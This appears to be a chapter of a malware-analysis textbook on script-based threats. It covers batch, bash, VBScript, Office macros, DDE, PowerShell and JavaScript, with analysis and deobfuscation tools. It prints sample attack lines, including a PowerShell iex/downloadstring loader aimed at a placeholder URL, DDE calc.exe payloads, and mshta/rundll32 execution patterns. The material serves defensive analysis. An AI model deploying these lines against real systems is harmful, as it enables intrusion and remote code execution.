Writing malware nowadays is a business, and, like any business, it aims to be as profitable as possible by reducing development and operational costs. Another strong advantage is being able to quickly adapt to changing requirements and the environment. Therefore, as modern systems become more and more diverse and low-level malware has to be more specific to its task, for basic operations, such as actual payload delivery, attackers tend to choose approaches that work on multiple platforms and require a minimum amount of effort to develop and upgrade. As a result, it is no surprise that scripting languages have become increasingly popular among attackers as many of them satisfy both of these criteria.
In addition to this, the traditional attacker requirements are still valid, such as being as stealthy as possible to successfully achieve malicious goals. If the script interpreter is already available on the target system, then the code will be of a relatively small size. Another reason for this anti-detection is that many traditional antivirus engines support binary and string signatures quite well, but to properly detect obfuscated code scripts, a syntax parser or emulator is required, and this might be costly for the antivirus company to develop and support. All of this makes scripts a perfect choice for first-stage modules.
In this chapter, we will cover the following topics:
Classic shell script languages
All modern operating systems support a command language of some kind, which is generally available through the shell. Their functionality varies from system to system. Some command languages might be powerful enough to be used as full-fledged script languages, while others support only the minimal syntax that is required to interact with the machine. In this chapter, we will cover the two most common examples: bash scripting for Unix and Linux and batch files for the Windows platform.
The Windows batch scripting language was created mainly to facilitate certain administrative tasks and not to completely replace other full-fledged alternatives. While it supports certain programming concepts, such as functions and loops, some quite basic operations, such as string manipulations, might be less obvious to implement compared to many other programming languages. The code can be executed directly from the cmd.exe console interface or by creating a file with the .cmd or .bat extensions. Note that the commands are case insensitive.
The list of supported commands remains quite limited, even today. All commands can be split into two groups, as follows:
Historically, no standard tools were provided to send HTTP requests (now curl has become available on modern versions of Windows) or to compress files. From the attacker’s perspective, this means that to implement more or less basic malware functionality, such as downloading, decrypting, and executing additional payloads, they must write extra code. Only later did system tools such as bitsadmin and certutil become commonly misused by attackers to download and decode the payloads. Here are some examples of how they were used:
In addition, there are a few lesser-known ways that Windows malware can access the remote payload using standard console commands, as follows:
Finally, some standard tools such as wmic natively support remote machines, so it is possible to execute certain commands on another victim’s machine if there are available credentials without the extra tools required.
More non-standard security-related applications for standard tools can be found on the LOLBAS project page: https://lolbas-project.github.io/.
The most common obfuscation patterns for batch files are as follows:
Figure 10.1 – An example of batch script obfuscation using escape symbols
Figure 10.2 – An example of batch script obfuscation using non-existing variables
The first and second cases can be handled by just printing the results of these operations using the echo command. The third and fourth cases can easily be handled by basic replacement operations, while the fifth case can be handled by just making everything lowercase except for things such as base64-encoded text.
Bash is a command-line interface that is native to the Unix world. It follows the one task one tool paradigm, where multiple simple programs can be chained together. The shell scripting supports fundamental programming blocks, such as loops, conditional constructs, and functions. In addition to this, it is powered by multiple external tools – most of which can be found on any supported system. Yet, unlike the Windows shell, which has multiple built-in commands, even the most basic functions, such as printing a string, are done by an independent program (in this case, echo). The common file extension for shell scripts is .sh. However, even a file without any extension will be executed properly if the corresponding interpreter is provided in the header; for example, #!/bin/bash. Unlike Windows, here, all commands are case sensitive.
There are many other shells in the Linux world, such as sh or zsh, but their syntax is largely the same.
As most Linux tools provide only a tiny piece of functionality, the full-fledged attack will involve many of them. However, some of them are used more often by attackers to achieve their goals, especially in mass-infection malware such as Mirai:
Figure 10.3 – An example of Mirai’s shell script
Just like for malware written in any other programming language, obfuscation can be incorporated here to slow down the reverse engineering process and bypass basic signature detection. Multiple approaches are possible in theory, such as dynamically decoding and executing commands, using crazy variable names, or applying sed/awk string replacements. However, it is worth mentioning that modern IoT malware still doesn’t incorporate any sophisticated tricks. This is mainly because the scripts that are used are quite generic and, often, they can only be reliably detected if the corresponding network IOC is known or if the final payload is detected.
That’s pretty much everything we need to know about shell scripts. Now, it’s time to talk about full-fledged programming languages. In particular, let’s start with Microsoft Visual Basic Scripting Edition (VBScript)-based threats.
VBScript was the first mainstream programming language embedded into Windows OS. It has been actively used by system administrators to automate certain types of tasks without the need to install any third-party software. Available on all modern Microsoft systems, it gradually became a popular choice for malware writers who were looking for a guaranteed way of performing certain actions without any need to recompile the associated code.
At the time of writing, Microsoft has decided to switch to PowerShell to handle administrative tasks and has left all future VBScript support to the ASP.NET framework. So far, there are no plans to discontinue it in future Windows releases.
The native file extension for VBScript files is .vbs, but it is also possible to encode them into files using a .vbe extension. Additionally, they can be embedded into Windows script files (.wsf) or HTML application (.hta) files. .vbs, .vbe, and .wsf files can be executed either by wscript.exe, which provides the proper GUI, or cscript.exe, which is the console alternative. .hta files can be executed by the mshta.exe tool. VBScript code can also be executed directly from the command line using the mshta vbscript:<script_body> syntax.
Initially, this technology was intended to be used by web developers and this fact drastically affected the syntax. VBScript is modeled on Visual Basic and has similar programming elements, such as conditional structures, loop structures, objects, and embedded functions. Data types are slightly different to work with: for example, all variables in VBScript have the Variant type by default.
Most of this high-level functionality can be accessed in the corresponding Microsoft Component Object Model (COM) objects. COM is a distributed system for creating and interacting with software components.
Here are some COM objects and the corresponding methods and properties that are often misused by attackers:
So, how can all this information be used when we’re performing an analysis? Here is a simple example of code executing another payload:
Dim Val Set Val= Wscript.CreateObject(“WScript.Shell") Val.Run “""C:Tempevil.vbe"""
As you can see, once the object has been created, its method can be executed straight away. Among native methods, the following can be used to execute expressions and statements:
Additionally, it is relatively straightforward to work with Windows Management Instrumentation (WMI) using VBScript. WMI is the infrastructure for managing data on Windows systems that gives access to various information, such as numerous system properties or a list of installed antivirus products. These are all potentially interesting to attackers.
Here are two ways it can be accessed:
Set objLocator = CreateObject("WbemScripting.SWbemLocator") Set objService = objLocator.ConnectServer(".", "rootcimv2") objService.Security_.ImpersonationLevel = 3
Set Jobs = objService.ExecQuery("SELECT * FROM AntiVirusProduct")
strComputer = "."
Set oWMI = GetObject("winmgmts:\" & "." & " ootSecurityCenter2")
Set colItems = oWMI.ExecQuery("SELECT * from AntiVirusProduct")
Now, let’s talk about what tools we can use to facilitate the analysis.
The once-supported Microsoft Script Debugger has been replaced by Microsoft Script Editor and was distributed as part of MS Office up to its 2007 edition; it was later discontinued:
Figure 10.4 – The Microsoft Script Editor interface
For basic static analysis, a generic text editor that supports syntax highlighting might be good enough. For dynamic analysis, it is highly recommended to use Visual Studio. Even the free community edition provides all the necessary functionality to do this in a very efficient way. To start the debugging process, first, you may wish to just execute the script the following way:
cscript.exe /x evilscript.vbs
However, for most people, it won’t work straight away. Before that, you will need to make sure your IDE is registered as a JIT debugger. To do this for Visual Studio, go to its Tools | Options... | Debugging | Just-In-Time settings and check that the Script tick is set:
Figure 10.5 – Registering Visual Studio as the JIT debugger for VBScript
After this, executing the aforementioned cscript command will automatically start suggesting that you use Visual Studio for debugging:
Figure 10.6 – cscript suggesting Visual Studio for VBScript debugging
Once confirmed, everything is ready for you to start dynamic analysis:
Figure 10.7 – Debugging the VBScript file in Visual Studio
While it is relatively straightforward to encode the .vbs file into .vbe using the EncodeScriptFile method provided by the Scripting.Encoder object, there is no native tool to decode the .vbe scripts back to .vbs; otherwise, it would diminish its purpose:
Figure 10.8 – The original and encoded VBScript files
However, there are several open source projects available that aim to solve this problem; for example, the decode-vbe.py tool by Didier Stevens.
When analyzing the code, it makes sense to pay particular attention to the following operations:
Finally, let’s talk about obfuscation and how to handle it.
Quite often, VBS obfuscation utilizes pretty basic techniques, such as adding garbage comments or using strings that require character replacement before they can be used. Syntax highlighting appears to be quite useful when analyzing such files.
Another common example is building a second-stage payload from the embedded data, such as from an array of integers, and then executing it dynamically, as shown in the following screenshot:
Figure 10.9 – VBScript malware dynamically builds a second-stage payload
One of the easiest ways to convert it into the actual code is to use a great online tool called CyberChef:
Figure 10.10 – The second stage of the VBScript malware after decoding
Once you have the actual functional code, the easiest way to handle it is to search for the functions you are most interested in (the ones that we previously listed) and check their parameters to get information about dropped or exfiltrated files, executed commands, accessed registry keys, and C&C(s) to connect. If the obfuscation layer makes functionality completely obscure, then it is necessary to keep track of variables accumulating at the next stage script. You can iterate through the layers one by one, printing or watching them to get the next block’s functionality until the main block of code becomes readable.
Now that we’ve learned about VBScript, let’s talk about a slightly different topic – macros and the threats that rely on them.
While many loud malware attacks were related to exploited vulnerabilities, humans remain the weakest link in the defense chain. Social engineering techniques can allow malicious actors to successfully execute their code without creating or buying complicated exploits.
Since many organizations now provide cybersecurity training for all newcomers, many people know basic things, such as that it is unsafe to click on links or executable files received by various means from outside of the organization or the group of people that you know. Therefore, the attackers have to invent new ways to trick users, and documents containing malicious macros are a great example of these ongoing efforts.
MS Office macros incorporate the Visual Basic for Applications (VBA) programming language. This is derived from Visual Basic 6, which was discontinued a long time ago. VBA survived and was later upgraded to version 7. Normally, the code can only run within a host application, and it is built into most Microsoft Office applications (even for macOS).
VBA is a dialect of Visual Basic and inherited its syntax. VBScript can be considered as a subset of VBA with a few simplifications, mainly caused by different application models. The same elements need to be paid attention to when analyzing VBA objects:
The list of COM objects that are of the attacker’s interest is also the same as they are for VBScript. The only difference is that some functionality can be accessed without creating objects; for example, the Shell method.
To ensure that it will be executed automatically, malware must use one of the standard function names that will define when it should happen. These names are slightly different for different MS Office products. Here are the most commonly misused ones:
Here is an example of Document_Open being used for this purpose:
Figure 10.11 – A malicious VBA macro registering the Document_Open routine to achieve execution
Malware can also install dedicated handlers so that it can be executed later under some condition, for example, using the Application.OnSheetActivate function.
MS Office has its own auto-start directories that are commonly misused by malware to achieve persistence. They do this by placing their code there. Here are the standard ones for different products and versions:
Apart from that, persistence can be achieved by manipulating global macro files:
Now, let’s talk about what tools can help us analyze malicious macros.
Unlike VBScript, VBA has a native editor in MS Office that can be accessed from the Developer tab, which is hidden by default. It can be enabled in Word Options in the Customize Ribbon menu:
Figure 10.12 – Enabling the VBA macro editor in MS Office options
It supports debugging the code in this way, making both static and dynamic analysis relatively straightforward.
Another tool that can extract macros from documents is OfficeMalScanner, when executed with the info command-line argument. Apart from this, the previously mentioned tools from the oletools project (especially olevba) and oledump can be used to extract and analyze VBA macros as well. If the engineer wants to work with p-code instead of source code for some reason, the pcodedmp project aims to provide the required functionality.
Finally, ViperMonkey can be used to emulate some VBA macros and, in this way, help handle obfuscation.
XLM macros, also known as formulas, are a 30-year-old feature of Microsoft Excel that suddenly gained popularity among attackers recently. An example of it is a SUM function, which is commonly used to automatically calculate a sum of numbers spread across multiple cells. While some of them may be dangerous out of the box, such as EXEC, which allows for arbitrary command execution, in most cases, attackers chain many benign ones to implement malicious functionality.
Here are some examples of commonly misused formulas in the final deobfuscated payload:
Another option similar to the CALL option is REGISTER.
An obvious example of a simple malicious payload utilizing them would be calling APIs such as URLDownloadToFile and ShellExecuteA to deliver and execute the next stage of the payload.
But in reality, pretty much all modern malicious macros will be obfuscated and will use a different set of macros to build the actual malicious functionality. We are going to cover them here. For .xls documents following the Compound File Binary (CFB) structure (more information can be found in Chapter 8, Handling Exploits and Shellcode), the workbook data is stored in the Binary Interchange File Format (BIFF8) format. Microsoft Excel doesn’t provide full functionality to edit it, so malware analysts may need to use dedicated tools to amend some of the changes that are made by the attackers to hide the content. For both .xlsb and .xlsm OOXML-based Excel documents, the corresponding data can generally be found in the xlmacrosheets directory in BIFF12 and XML formats, respectively.
Finally, the same as in VBA macros, formulas can use some particular standard cell names to achieve autorun capabilities. An example would be the cell starting with the Auto_Open prefix:
Figure 10.13 – The cell with the XLM macro that will be automatically executed
Now, let’s talk about how XLM-based payloads can be obfuscated.
There are multiple ways attackers may attempt to complicate the work of reverse engineers trying to figure out malware’s purpose. Let’s explore the most common of them:
Figure 10.14 – Unhiding hidden sheets in Excel
Figure 10.15 – Changing the hsState field associated with a veryhidden sheet
Figure 10.16 – Changing the fHidden field to unhide the associated name
These are the most common obfuscation techniques. Finally, let’s see what tools can help us with the analysis.
First of all, the already mentioned olevba tool can be used to automatically extract XLM macros as well. If another tool called XLMMacroDeobfuscator is also installed on the same system, the output of olevba will also be nicely deobfuscated:
Figure 10.17 – Extracted and deobfuscated chain of XLM macros
Apart from that, Microsoft Excel provides great embedded capabilities for debugging formulas. Mainly, its Name Manager and Macro Debugger parts will be particularly useful:
Figure 10.18 – Dynamic analysis of a chain of XLM macros using Excel’s debugger
Finally, the BiffView and OffVis tools can provide an intimate view of BIFF8 internals. OffVis can also help bypass some of the aforementioned obfuscation techniques that involve hiding sheets and names.
That’s it for XLM macros. We have already learned a lot about macro-based threats, so now, it is time to cover other ways how malware may achieve its goals by misusing MS Office documents.
There are other methods that attackers may use to execute code once the document is opened. Another approach is to use the mouse click/mouse over technique, which involves executing a command when the user moves the mouse over a crafted object in PowerPoint.
This can be done by assigning the corresponding action to it, as follows:
Figure 10.19 – Adding an action to an object in PowerPoint
The good news is that updated versions of Microsoft Office should have a protected view (read-only access) security feature enabled, which will warn a user about a potential external program’s execution if the document came from an unsafe location. In this case, it will be all about social engineering – whether the attacker succeeds in convincing the victim to ignore or disable all warnings.
Another less common way how malware may achieve execution is by using Setting Content files. These are XML-based files that can be executed on their own (with a .SettingContent-ms file extension) or embedded into other documents. The DeepLink tag can be used there to specify the command to be executed. After the first few attempts to misuse this functionality, Microsoft promptly beefed up the security of this feature. Now, we don’t see malware targeting it much.
Finally, the Dynamic Data Exchange (DDE) functionality can also be used to execute malicious commands. One way it can do this is by adding a DDEAUTO field with the command to execute, specified as the argument. Another way this functionality can be misused is by using particular syntax in Microsoft Excel. In this case, a malicious file will contain the command crafted in the following way:
(+|-|=)<command_to_execute>|'<optional_arguments_prepended_by_space>'!<row_or_c olumn_or_cell_number>
Alternatively, the command can be passed as an argument to a built-in benign function such as SUM. Here are some example payloads that execute calc.exe after the user’s confirmation:
=calc|' '!A +cmd|' /c calc.exe'!7 @SUM(calc|' '!Z99)
Here is an example of the warning message that’s displayed by Microsoft Excel when this technique is used:
Figure 10.20 – An example of a Microsoft Excel warning box related to potential code execution
The msodde tool (part of oletools) may help in detecting such techniques in samples.
While any code execution here will require user confirmation before being enabled, it remains a possible attacking vector with the help of social engineering.
Now that we’ve mastered macro-based threats, it is time to talk about another scripting language commonly misused by attackers these days – PowerShell!
PowerShell represents an ongoing evolution of Windows shell and scripting languages. Its powerful functionality, access to .NET methods, and deep integration with recent versions of Windows have facilitated the increase of its popularity drastically among common users and malicious actors. From the point of view of the attacker, it has many other advantages, especially in terms of obfuscation, which we are going to cover in great detail. Additionally, because the whole script can be encoded and executed as a single command, it requires no script files to hit the hard disk and leaves minimal traces for forensic experts.
Let’s start with the peculiarities of its syntax.
PowerShell command-line arguments provide unique opportunities for the attackers because of certain characteristics of their implementation. For example, PowerShell understands even truncated arguments and the associated parameters, so long as they are not ambiguous. Let’s go through some of the most common values that are used when executing the malicious code:
In the preceding examples, the command-line arguments can be truncated to any number of letters and still be valid for PowerShell. For example, -NoProfile and -NoProf, or Hidden and Hidde, will be processed in the same way.
Regarding the syntax, let’s look at some commands that are often misused by attackers.
Native cmdlets:
NET-based methods:
Each of these methods has an async version as well, with the corresponding name suffix (such as DownloadStringAsync).
For .NET namespaces, the System. prefix can be safely omitted, as follows:
Figure 10.21 – An example of a Veil payload
As we can see, using a combination of compression and base64 encoding is a very popular technique among attackers to store the next stage payload and, in this way, complicate the analysis and detection. We will talk about other obfuscation techniques in greater detail in the next section. Here is an example of the code downloading the payload and executing it:
iex(new-object net.webclient).downloadstring('http://<url>/payload.bin')
Just like command-line arguments, the method names can be truncated without creating ambiguity. The Get-Command/gcm command with wildcards can be used by the analyst to identify the full name and can also be used by attackers to dynamically resolve them.
PowerShell can also be used to execute custom .NET code. In particular, the Add-Type -TypeDefinition <variable_storing_source_code> syntax can be used to dynamically compile .NET source code directly in the PowerShell script so that it can be used straight away. The csc.exe tool will be used behind the scenes for this purpose.
The notorious PowerShell-based Bluwimps stores information in WMI management classes. This makes it harder to detect using traditional antivirus solutions, and it can remotely execute code using the Windows Management Instrumentation Command (WMIC) instead of utilizing the more widely used psexec tool.
There are multiple open source tools available online that can generate and/or obfuscate PowerShell-based payloads for penetration testing. This list includes, but is not limited to, the following:
As we know, PowerShell commands are executed through the Windows console, so pretty much any obfuscation technique we described previously can be applied here as well. In addition to this, several other simple obfuscation tricks have proved to be popular:
iex (<value_with_separators>.split("<separator>") -join "") | iex)
In terms of encryption, the following approaches have proved to be popular:
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(<secure_string>))
For this cmdlet, the decryption key can be provided in either a -key or a -securekey argument (or perhaps something like -kE).
To handle them, you must successfully identify the algorithm that’s being used and then reverse the logic using the information available. Writing simple scripts using your language of preference is one option, but in many cases, it can only be handled using the online CyberChef tool.
Let’s talk about what other tools we can use to facilitate the analysis.
PowerShell has a powerful embedded help tool that can be used to get the description of any command. It can be obtained by executing a Get-Help <command_name> statement:
Figure 10.22 – Getting a description for a PowerShell command
Overall, deobfuscation and decoding operations mainly require only a basic set of skills, such as how to decode base64, how to decompress deflate and gzip, how to remove meaningless characters, how to replace variables, and how to read partially written commands. Any text editor with the corresponding syntax highlight can be used for static analysis in this case.
While xor can be decrypted in multiple ways, the easiest way to handle embedded PowerShell encryption is through dynamic analysis in the PowerShell Integrated Scripting Environment (ISE). In this case, the code to dump the decrypted string on a disk is added straight after the decryption block. For this purpose, the Set-Content, Add-Content, and Out-File cmdlets, along with the pipe symbol (|) or classic > and >> input redirects, can be used:
powershell -c "$a='secret'; $a | set-content 'output.txt'"
Alternatively, the Write-Host cmdlet can be used to write the decrypted output to the console and then redirect it to a file. Finally, a great tool called PSDecode can be used to quickly try to handle obfuscation automatically (this may involve code execution, so use it with care).
Now, it is time to talk about JavaScript-based threats.
JavaScript is a web language that powers billions of pages on the internet, so it is no surprise that it is commonly used to create exploits that target web users. However, on Windows, it is also possible to execute JScript (a very similar dialect of ECMAScript) files through Windows Script Host, which also makes it a good candidate for malicious attachments and post-compromised scripting. For example, a fileless threat called Poweliks uses JScript code stored in the registry to achieve system persistence without leaving separate files on a disk.
Since there are minor differences between JavaScript and JScript, here, we will cover syntax that is common to both of them. Additionally, starting from this moment, we will use the JavaScript notation.
The universal file extension for JavaScript files is .js; encoded JScript files have the .jse extension. Additionally, they can be embedded into .wsf and .hta files in the same way as VBScript. In terms of similarity, on Windows, both .js/.jse and .wsf files can be executed locally by wscript.exe and cscript.exe. On the other hand, .hta files are executed by mshta.exe. There are several ways to execute inline JavaScript scripts:
mshta javascript:<script_body>
rundll32.exe javascript:"..mshtml,RunHTMLApplication";<script_body>
In addition to this, on Windows, it is possible to execute JavaScript code using regsvr32.exe as a COM scriptlet (.sct files). On Linux, multiple options are available for executing JavaScript files from the console, such as phantomjs, and, of course, the JavaScript code can be executed in full-fledged browsers. We will cover this in more detail in the Static and dynamic analysis section.
If the script is going to be executed locally, particular attention should be paid to certain types of operations that can answer questions about its purpose, persistence mechanism, and communication protocol. In terms of similarity with VBScript, on Windows, the same COM objects can be used for this purpose, as described previously:
Figure 10.23 – An example of JavaScript code writing data to a file on Windows
On Linux, JavaScript is not used to execute commands locally as it requires some custom modules, such as node.js, which may not be available on the target system.
In terms of web applications, the following functions need to be paid attention to:
Code execution:
eval: Execute a script block provided as an argument
Page redirects:
There are multiple options here, as shown in the following code block:
Important note
The window. part can commonly be omitted.
Important note
There are also possible derivatives for them, similar to the window.location-based techniques mentioned previously.
Apart from that, there is also another way to redirect the user without using JavaScript:
External script loading:
Web requests to remote machines:
Popular libraries such as jQuery and custom implementations of asynchronous JavaScript and XML (Ajax) usually utilize XMLHttpRequest and sometimes fetch requests on the backend.
The most common JavaScript obfuscation technique that’s employed with some variations is dynamically building the next layer of JavaScript code by either decrypting it or assembling it from integers with the subsequent execution using the eval function or updating the document using document.write:
Figure 10.24 – Obfuscated JavaScript-based threat
However, several other techniques are widely used by malware authors:
window['console']['log'] = <other_function>;
Alternatively, it is possible to redefine the function as follows:
var console = {};
console.log = <other_function>;
There are other techniques as well, but these are used in malware most often.
With web development on the rise, there are plenty of tools that exist for analyzing and debugging JavaScript code – from basic text editors with syntax highlights to quite sophisticated packages. However, the developer’s use cases are quite different from the reverse engineer’s, which eventually determines which set of programs are used by them.
First of all, to speed up the analysis, it makes sense to reformat the existing JavaScript code so that it is easier to follow the logic. Multiple tools serve this purpose and they contain basic unpacking and deobfuscation logic, such as jsbeautifier.
In terms of generic dynamic analysis, embedded browser toolsets such as Chrome Developer Tools and Firefox Developer Tools are extremely handy. To use them, a small HTML block needs to be written to load the JavaScript file of interest.
Here, the JavaScript code is embedded into the page itself:
Figure 10.25 – An example of the embedded JavaScript code in Chrome Developer Tools
Here is the externally loaded JavaScript script in Firefox:
Figure 10.26 – An example of the external JavaScript script in Firefox Developer Tools
In addition to this, several customized tools implement the functionality required for malware analysis. One of them is Malzilla; this free toolset combines multiple smaller tools that aim to make analysis easier by implementing the most common operations required. While relatively old, it is still used by many malware analysts to quickly go through obfuscation layers and extract the actual functionality.
The most commonly used functionality of Malzilla is the module that can intercept the eval call and output its argument to the screen. This is an extremely useful feature as most obfuscation techniques build up the actual payload before executing it using this function. This means that this is the point where the decrypted or deobfuscated logic becomes available, sometimes after a few iterations. It also includes various smart decoders that drastically speed up the analysis:
Figure 10.27 – Malzilla decoders
Another example of such a tool is the more recent JSDetox project. It aims to facilitate static analysis and handle JavaScript obfuscation techniques. Unlike Malzilla, it is more focused on the Linux environment:
Figure 10.28 – The JSDetox website describing its functionality
Now, let’s talk about the backend code.
Many malware families use some sort of C&C server to receive updates or custom commands from the malicious actor or to exfiltrate stolen data. Getting access to these backend files can give researchers and law enforcement agencies a lot of information about how malware works and who the victims are. Sometimes, it can even lead to the actual people behind the attack! Therefore, properly and promptly analyzing the code obtained from the C&C is an important task that researchers have to face from time to time, so it’s better to be ready!
So long as the analyst has access to the code, it makes sense to prepare and prioritize a list of questions to answer. Generally, the following knowledge can be obtained from the backend:
More advanced steps include searching for communication patterns that may help identify future C&Cs. If the HTTPS protocol was used, it may make sense to check where the corresponding certificate came from.
Multiple programming languages can be used to implement a backend. Whether it is PHP, Perl, Python, or something else, you need to correctly identify the programming language and check whether it is a ready framework. The first part of this task can be solved by looking at the corresponding file extensions. For the second part, the configuration files or directories will usually contain the name of the framework used.
Installing the corresponding IDE and loading the project there will drastically speed up further analysis as it will facilitate efficient static and dynamic analysis.
In this chapter, we covered the most common examples of languages used nowadays. But what if you encounter something more exotic that you don’t have a ready step-by-step tutorial for? Or what if a new script language becomes increasingly popular, is available on lots of systems, and is, therefore, misused by malicious actors? Don’t panic – we have summarized the ideas that will help you successfully analyze any new threat.
Here is what you should do when analyzing a new threat:
If the script language is compiled, search for tools such as decompilers or disassemblers to make static analysis possible.
Once you can analyze code, the next important step will be figuring out what to focus on.
Reverse engineering is not just an engineering task – often, it requires a certain amount of research and creativity to solve the corresponding challenges.
Usually, the analysis time is limited by circumstances. Therefore, pay particular attention to the functionality that will help answer the questions needed to complete the report. This part might be tricky because, without taking a look at everything, it is difficult to say whether the description is complete or not. Searching for the keywords of functions of interest and checking their references should be a good starting point. After this, it makes sense to check whether any block of code was encrypted, encoded, or loaded externally. Keeping your markup accurate will help you navigate the whole project and allow you to quickly come back later if necessary.
In this chapter, we covered multiple script languages and document macros that are often misused by attackers. We described the motivation behind a malware writer’s decision when they are choosing a particular approach. Additionally, we explored ready-to-use recipes on how to solve particular challenges specific to each language and summarized what functionality to pay attention to. You also gained a good understanding of various tools that will drastically help speed up analysis.
Finally, we covered generic approaches on how to handle malicious code written in virtually any script language that you may encounter. We also discussed the sequence of actions to follow to analyze malicious code efficiently.
After completing this chapter, you can now successfully perform static and dynamic analyses of various scripts, bypass anti-reversing techniques, and understand the core functionality of malware.
In Chapter 11, Dissecting Linux and IoT Malware, we will explore threats that target various Linux-based and IoT systems, learn how to analyze them, and then learn how to extend some of the knowledge you have gained from this chapter.
18.219.102.189